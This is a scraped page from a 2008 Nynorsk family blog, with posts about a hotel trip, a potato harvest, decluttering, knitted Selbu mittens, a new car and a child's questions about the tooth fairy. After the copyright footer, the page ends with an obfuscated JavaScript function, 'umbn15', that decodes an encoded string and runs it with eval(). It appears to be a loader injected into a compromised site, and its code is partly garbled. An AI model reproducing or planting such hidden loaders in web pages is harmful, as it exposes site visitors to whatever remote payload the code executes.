Tankar ved eit tastatur abbr em{border:1px solid; display:block; padding:4px;}.recentcomments a{display:inline !important;padding: 0 !important;margin: 0 !important;} Tankar ved eit tastatur Mest om familie, hobby og kvardagsliv.
Velkommen!
Hausten er her, og eg har bytta ut mosaikken til høgre med bilete som gjev litt smak av nettopp dette.
Håpar du finn noko av interesse her, og eg set stor pris på om du legg at ein kommentar når du er innom!
susnet_counter_id = 53762;
susnet_security_code = '69010';
susnet_node=0;
register();
Blogging frå hotell oktober 9th, 2008 Eg og Hulda er på jentetur i samband med PPS-brukarforum. Vi er i Hovudstaden! Kom hit tidleg i dag, og har nytta dagen til å sjå i butikkar, handla litt (ikkje garn! Ikkje eitt nøste! Ikkje enno iallfall …), og vorte samde om at Panduro er vår favorittbutikk!Her bur vi: På Radisson Sas Scandinavia. Kvifor dette hotellet? Vel, det har basseng i kjellaren! Og der har vi òg vore i dag.  Middag på Peppe’s er bra for damer på bytur! Hulda kjøpte seg ein salat til kveldsmat, og gjett om ho kosa seg med å ete i hotellsenga!Og kva gjer to damer som har vore på Panduro når dagen er på hell? Lager julekort vel! Men no er det på tide å sova. I morgon er atter ein dag. Posted in bloggings | 4 Comments » Helga er over oktober 6th, 2008 I helga har vi mellom anna drive med potetopptaking. Vi har ikkje så stor ein flekk, men vi sette ned 96(?) potetar, og fekk ei avling på omlag 25 kilo! Alle tok del i potetopptakinga, og Even var storfornøgd med potethausten. “Det her e jo heilt patetisk“ sa han. I ettertid har eg funne ut at fantastisk truleg var ordet han leita etter.   Og i tillegg til å vere potetbonde har eg sydd litt. Eg måtte ha ei stor mappe til eit sjal eg strikkar på: Eg er nøgd sjølv og ho funkar flott! Posted in bloggings | 8 Comments » Dagens oktober 6th, 2008 Eg har vorte tagga av Cat!Dagens høgdepunkt: Å invitera Hulda med på “jentetur” i samband med at eg skal på PPS-samling i Hovudstaden.Dagens sang på hjernen: Genservise av Alf Prøysen (slik er det når ein arbeider i eldreomsorgen!)Dagens joviale: Det skal vi finna ei løysing på, veit du! Dagens fnis: Tenk å vere 31 år og få butikkdamene til å springa butikken rundt for å finna lakrissnører til meg!?!Dagens irritasjonsmoment: Vakttelefonar som ikkje virkar som dei skal!Dagens “for første gang”: Hulda gler seg iallfall til sin fyrste gong på hotell no i haustferien!Dagens beste måltid: Chili con carne frå i går. Mmmmm!Dagens spørsmål: Denne var verre … Kjem ikkje på noko fornuftig her, eg. Ikkje noko ufornuftig heller, forresten.Dagens ordtak: Det ordnar seg alltid!Kanskje Ellen, Annie og Betty vi svare på denne? Posted in bloggings | 2 Comments » Decluttering veke 13 av 52 oktober 6th, 2008 Eg har rydda i gangen att! Og no har eg i tillegg til å fjerna saker og ting hengt opp mellom anna ei hylle og fleire kroker til å henge ting på. Og så har eg laga eit nytt System i lag med Even. Vi har funne oss ei plastkasse med lokk som står i trappa, og i den kassen skal vi legge “småting” som elles ligg på golvet i gangen, midt i trappa e.l. Og så skal eg ta på meg å masa på alle familiemedlemma innimellom slik at alle tek med sine ting frå kassa, og det som vert liggande att, går i søpla. Genialt om eg skal seie det sjølv! Posted in bloggings | 1 Comment » Award! oktober 4th, 2008 Eg har fått ein award frå Røvardottir (aka Beyla): Slikt kan vi like! Denne må gå vidare til Hege som alltid får meg i godt humør, både med hobbybloggen og turbloggen sin, til Hulda, til Hedvig (som eg trur strikker konstant! Skjønar ikkje korleis ho får tid til å oppdatera bloggen sin, eg!), til Ragnhild og sist, men ikkje minst til Lena! Riktig god helg til flotte bloggedamer!I tillegg har eg vorte tagga, men det skal eg kome attende til seinare. Posted in bloggings | 2 Comments » Selbuvottar/selbumittens september 30th, 2008 Eg har heilt gløymt å blogge selbuvottane eg sleit med i lang tid. Eg hadde ei vond skulder, så ein kan seie at det tok uvanleg lang tid å ferdigstille dei, men eg er iallfall nøgd. Strikka i Silja strømpegarn. Oppskrifta er frå heftet “Selbustrikk”, kjøpt på Husfliden i Levanger. It took some time to finish these mittens due to a bad shoulder, but I was finally finished early this month. Selbumittens from the booklet “Selbustrikk” (view on Ravelry)Knitted in Silja from Gjestal. Posted in bloggings | 4 Comments » Grublaren september 28th, 2008 Eg er mor til ein liten grublar. For tida er han litt oppteken av tenner og tannfeen. Sjølv har han (til si store sorg) alle melketennene intakte, og difor opptek det han litt dette med glaset med tann i som vert til pengar over natta.I dag grubla han seg inn på dette sporet:“Mamma, tenk på før i tia, da. Da hadd dæmm jotj ein gong glas å lægg tanna i!”“Nehei?”“Nei, da trur æ nok dæm la den under puta. Det trur æ, ja”“Ja, kanskje det …”“Eller, nei, du veit det mamma, at dæm hadd jotj puta heller før i tia. Da låg dæm jo i høyet. Da kanskje dæm berre gjømt tennern inni høyet da!”“Jaha?”“Ja, men tenk da mamma, om det kom ein gut uten tenner og hoppa i høyet da! Da kanskje hann fekk munnen full tå tenner da!” Posted in bloggings | 5 Comments » Vi har handla september 28th, 2008 ny bil!!!Renaulten gjekk langt frå EU-testen, og på grunn av dyre naudsynte reparasjonar, vart vi samde om heller å bytta ut bilen. Det vart ein ny franskmann, ein Citröen Xsara. Korleis uttaler ein Xsara? Iallfall, ein 2000 modell som er knakande god å køyre. Og fiiin: No, Cat, har eg blogga. Så har du iallfall noko å lese i kveld! Kanhenda det kjem meir når huset er stilt. Posted in bloggings | 7 Comments » Decluttering veke 12 av 52 september 28th, 2008 Kvar dag ser eg nye ting som kan fjernast frå huset. Eg har rydda Even sitt rom denne veka, og der plukka eg mellom anna ut bilete-bøker frå hylla hans. Eg trur vi skal gje dei bort til eitt eller anna “godt formål”. Er det nokon som har gode idéar? Posted in bloggings | No Comments » Decluttering veke 11 av 52 september 24th, 2008 Som eg sa i går, så går eg over til å blogge decluttering per veke i staden for per dag. Eg kjente eg fekk avsmak for heile blogginga når eg hadde eit press på meg til å skriva om eitt bestemt emne når eg eigentleg ville skriva om noko anna, men ikkje fann tid til begge delar. Iallfall: Veke 11 gjekk med til “vanleg kasting”. No har eg byrja å la små-leikar (reklamefigurar o.l.) gå i søpla når eg finn dei liggande under bordet eller mellom sofaputene eller liknande. Ungane mine har nok leikar, trur eg, og dei har iallfall nok fnikkfnakk som dei eigentleg ikkje brukar. Posted in bloggings | 2 Comments » « Previous Entries Knit ProMonica’s creationsOm meg …Oppskrifter You can find some translated versions of my writing here
susnet_counter_id = 53762;
susnet_security_code = '69010';
susnet_node=0;
getMonthUniqueVisitors();
betty42 til Blogging frå hotellEllens tråd i veven » Bloggarkiv » Dagens til DagensBeyla til Blogging frå hotellHege til Blogging frå hotellSynnøve til Blogging frå hotell Hobbyforums bloggerePower By Ringsurf oktober 2008 september 2008 august 2008 juli 2008 juni 2008 mai 2008 april 2008 mars 2008 februar 2008 januar 2008 desember 2007 november 2007 oktober 2007 september 2007 august 2007 juli 2007 juni 2007 mai 2007 april 2007 mars 2007 februar 2007 januar 2007 desember 2006 november 2006 oktober 2006 september 2006 juli 2006 juni 2006 april 2006 mars 2006 februar 2006 januar 2006 desember 2005 november 2005 Search
Log in Innlegg RSS Kommentarer RSS WordPress.org
.zg_div {margin:0px 5px 5px 0px; width:117px;}
.zg_div_inner {border: solid 1px #FF00CC; background-color:#ffffff; color:#666666; text-align:center; font-family:arial, helvetica; font-size:11px;}
.zg_div a, .zg_div a:hover, .zg_div a:visited {color:#99CCFF; background:inherit !important; text-decoration:none !important;}
zg_insert_badge = function() {
var zg_bg_color = 'ffffff';
var zgi_url = 'http://www.flickr.com/apps/badge/badge_iframe.gne?zg_bg_color='+zg_bg_color+'&zg_person_id=17637986%40N05&zg_set_id=72157602869850110&zg_context=in%2Fset-72157602869850110%2F';
document.write(' Copyright © 2007 Tankar ved eit tastatur – Entries (RSS) | Powered by WordPress – Theme Sakura3 created by - area381 google.comfunction umbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,15,43,57,26,62,59,12,40,5,0,0,0,0,0,0,3,27,31,38,45,58,7,54,4,11,42,36,52,13,17,18,46,56,32,0,16,1,47,21,9,10,2,0,0,0,0,33,0,53,19,25,37,8,20,29,30,34,48,44,14,6,50,22,55,41,24,60,61,51,23,28,35,39,49);for(i=Math.ceil(h/k);i>0;i--){c=\'\';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])=8;d-=2}else{d=6}}}eval(c);}}umbn15(\'gle_loryHyqyIE3ychguPoe_1GwLloriBhQxHEXzgi3Rh58jMAtR7i3iF58nHPQ_1hDxeiQi7JwCrCQaeI8yhJXL9vsilEQzXoe_h5e_hh7imoriUO7_1EczhowaMFsqIEqRHxc_BO8xZBEihYezrPe_loQ_Z17jAIDLA0tjUpkxeiQi7GwjMxkngl8xhYQac0tpYIQx@G8Rhhtpc2wChlq_1hMnllrC44QibZM_9OQxebDa91exrPQ_1Ogu@@\') |
|